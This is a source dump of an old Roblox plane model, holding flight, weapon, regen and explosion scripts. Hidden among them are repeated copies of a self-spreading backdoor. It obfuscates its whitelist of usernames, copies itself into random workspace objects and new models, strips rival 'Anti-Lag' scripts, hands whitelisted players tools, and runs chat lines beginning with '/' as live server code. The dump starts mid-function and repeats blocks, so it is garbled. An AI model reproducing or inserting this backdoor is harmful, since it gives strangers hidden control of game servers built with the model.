- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() model = script.Parent.Parent.Parent
- backup = model:clone()
- local debounce = false
- function onTouch(part)
- if (part.Name == "Safe") and (debounce == false) and (script.Parent.Count.Value == 0) then
- debounce = true
- wait(2)
- model = backup:clone()
- model.Parent = game.Workspace
- model:makeJoints()
- script.Parent.Count.Value = 1
- debounce = false
- end
- end
- script.Parent.Touched:connect(onTouch) end;
- function() position = script.Parent.Engine.Position
- local frame = Instance.new("CFrameValue")
- frame.Name = "OriginCFrame"
- frame.Value = script.Parent.Engine.CFrame
- frame.Parent = script.Parent
- local object = Instance.new("ObjectValue")
- object.Value = script.Parent.Parent.Parent
- seat = script.Parent.Seat
- function onChildAdded(part)
- if part.className == "Weld" then
- local torso = part.Part1
- if torso ~= nil then
- local parent = torso.Parent
- if parent ~= nil then
- script.Parent.Parent.Parent = parent
- while true do
- wait(2)
- local pos = script.Parent.Engine.Position
- if (position - pos).magnitude > 30 then
- if object.Value ~= nil then
- object.Value.Regen.Value = 1
- wait(.5)
- object.Value.Regen.Value = 0
- object.Value = nil
- end
- break end
- end
- while true do
- print("Loop")
- wait(2)
- if part == nil then
- script.Parent.Parent.Parent = game.Workspace
- script.Parent.Parent:MakeJoints()
- break end
- end
- end
- end
- end
- end
- seat.ChildAdded:connect(onChildAdded) end;
- function() function onTouched(part)
- if part.Parent ~= nil then
- local h = part.Parent:findFirstChild("Humanoid")
- if h~=nil then
- h.Parent.Torso.Velocity=Vector3.new(0,200,0)
- wait(0.5)
- end
- end
- end
- script.Parent.Touched:connect(onTouched)
- end;
- function() local boom = false
- function createExplosion(position)
- explosion = Instance.new("Explosion")
- explosion.Position = position
- explosion.BlastRadius = 10
- explosion.Parent = game.Workspace
- end
- function onTouch(part)
- if boom == true then return end
- if (part.Name == "Rocket") or (part.Name == "Safe") or (part.Parent.Parent.Parent == script.Parent) or (part.Parent:findFirstChild("Humanoid")) then return end
- if (script.Parent.Parts.Tip.Velocity.x > 50) or (script.Parent.Parts.Tip.Velocity.x < -50) or (script.Parent.Parts.Tip.Velocity.z > 50) or (script.Parent.Parts.Tip.Velocity.z < -50) then
- boom = true
- createExplosion(script.Parent.Parts.Engine.Position)
- script.Parent:BreakJoints()
- local stuff = script.Parent:children()
- for i=1,#stuff do
- if stuff[i].Name == "BodyKit" or
- stuff[i].Name == "Parts" then
- local parts = stuff[i]:children()
- for p = 1, #parts do
- if parts[p].className == "Part" then
- local velo = Instance.new("BodyVelocity")
- velo.maxForce = Vector3.new(9.9e+036, 9.9e+036, 9.9e+036)
- velo.velocity = Vector3.new(math.random(-15,15),math.random(-15,15),math.random(-15,15))
- velo.Parent = parts[p]
- end
- end
- end
- end
- wait(3)
- script.Parent:remove()
- end
- end
- script.Parent.Parts.Tip.Touched:connect(onTouch)
- end;
- function() bin=script.Parent
- plane=nil
- hold=false
- local debounce = false
- local planedebounce = false
- local stuntdebounce = false
- local controlling = false
- function fire(pln,spn)
- local missile = bin.Rocket:clone()
- missile.CFrame = spn.CFrame * CFrame.new(0, 0, -35)
- missile.RocketScript.Disabled = false
- missile.Parent = game.Workspace
- local creator_tag = Instance.new("ObjectValue")
- creator_tag.Value = game.Players.LocalPlayer
- creator_tag.Name = "creator"
- creator_tag.Parent = missile
- missile.Owner.Value = pln
- end
- function computeDirection(vec)
- local lenSquared = vec.magnitude * vec.magnitude
- local invSqrt = 1 / math.sqrt(lenSquared)
- return Vector3.new(vec.x * invSqrt, vec.y * invSqrt, vec.z * invSqrt)
- end
- function move(target, engine)
- local origincframe = engine:findFirstChild("BodyGyro").cframe
- local dir = (target - engine.Position).unit
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(9000, 9000, 9000)
- engine:findFirstChild("BodyGyro").cframe = CFrame.new(pos, pos + dir)
- wait(0.1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(0, 0, 0)
- engine:findFirstChild("BodyGyro").cframe = origincframe
- end
- function findPlane(player)
- local list = player.Character:GetChildren()
- for x = 1, #list do
- if (list[x].Name == "Plane") then
- local weld = list[x]:FindFirstChild("Parts"):FindFirstChild("Seat"):FindFirstChild("SeatWeld")
- if (weld ~= nil) and (weld.Part1 == player.Character:FindFirstChild("Torso")) then
- return list[x]
- end
- end
- end
- return nil
- end
- function onButton1Down(mouse)
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if vehicle ~= nil and debounce == false and planedebounce == false then
- debounce = true
- controlling = true
- while true do
- wait()
- local engine = vehicle.Parts.Engine
- local position = mouse.Hit
- local target = position.p
- if engine:findFirstChild("FlyScript") ~= nil then
- move(target, engine)
- end
- if planedebounce == true or
- controlling == false then break end
- end
- wait(.1)
- debounce = false
- end
- end
- function onButton1Up(mouse)
- controlling = false
- end
- function onSelected(mouse)
- mouse.Icon = "rbxasset://textures\\GunCursor.png"
- mouse.Button1Down:connect(function() onButton1Down(mouse) end)
- mouse.Button1Up:connect(function() onButton1Up(mouse) end)
- mouse.KeyDown:connect(onKeyDown)
- end
- function onKeyDown(key)
- if (key~=nil) then
- key = key:lower()
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if (vehicle==nil) then return end
- plane = vehicle.Parts
- local engine = vehicle.Parts.Engine
- if (key=="f") and (bin.Reload.Value == 0) then
- fire(vehicle,plane.Gun1)
- fire(vehicle,plane.Gun2)
- bin.Reload.Value = 1
- wait(1)
- bin.Reload.Value = 0
- end
- if (key=="x") and planedebounce == false then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then
- power:remove()
- end
- end
- if (key=="y") then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then return end
- local fly = script.FlyScript:clone()
- fly.Disabled = false
- fly.Parent = plane.Engine
- end
- if (key=="k") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- end
- if (key=="h") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- return end
- if (key=="j") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, 0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="l") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 0, 0)
- local frame = plane:FindFirstChild("OriginCFrame")
- if frame ~= nil then
- body.cframe = frame.Value
- end
- wait(0.1)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="u") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, -0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="g") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- for i = 1,6 do
- body.cframe = plane.Engine.CFrame * CFrame.fromEulerAnglesXYZ(0, 0, 30)
- wait(.2)
- end
- body.cframe = currentframe
- wait(.6)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(3)
- stuntdebounce = false
- end
- if (key=="t") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- local valy = 30
- local valz = 30
- for i = 1,8 do
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, valy, valz)
- valy = valy +50
- valz = valz +100
- wait(.1)
- end
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, 600, 0)
- wait(.5)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(4)
- stuntdebounce = false
- end
- end
- end
- bin.Selected:connect(onSelected)
- end;
- function() local engine = script.Parent.Parent.Engine
- local spd = 3
- local position = engine.Position
- while true do
- wait(.1)
- direction = engine.CFrame.lookVector
- position = position + spd*3*direction
- error = position - engine.Position
- engine.Velocity = spd*error
- engine.RotVelocity = Vector3.new(0, 0, 0)
- end
- end;
- function() local debounce = false
- function getPlayer(humanoid)
- local players = game.Players:children()
- for i = 1, #players do
- if players[i].Character.Humanoid == humanoid then return players[i] end
- end
- return nil
- end
- function onTouch(part)
- local human = part.Parent:findFirstChild("Humanoid")
- if (human ~= nil) and debounce == false then
- debounce = true
- local player = getPlayer(human)
- if (player == nil) then return end
- script.Parent:clone().Parent = player.Backpack
- wait(2)
- debounce = false
- end
- end
- script.Parent.Parent.Touched:connect(onTouch)
- end;
- function() --DONT PUT THIS IN ANYTHING IT'S JUST INSTRUCTIONS.
- --First Place the "PUT THIS IN THE WEAPON" script in your Weapon or Tool.
- --Then place your Weapon or Tool in the "PUT THE WEAPON IN THIS BRICK" brick.
- --IMPORTANT (OPTINAL)
- --Before doing anything you should put the Weapon or Tool in the giver where you want it. end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
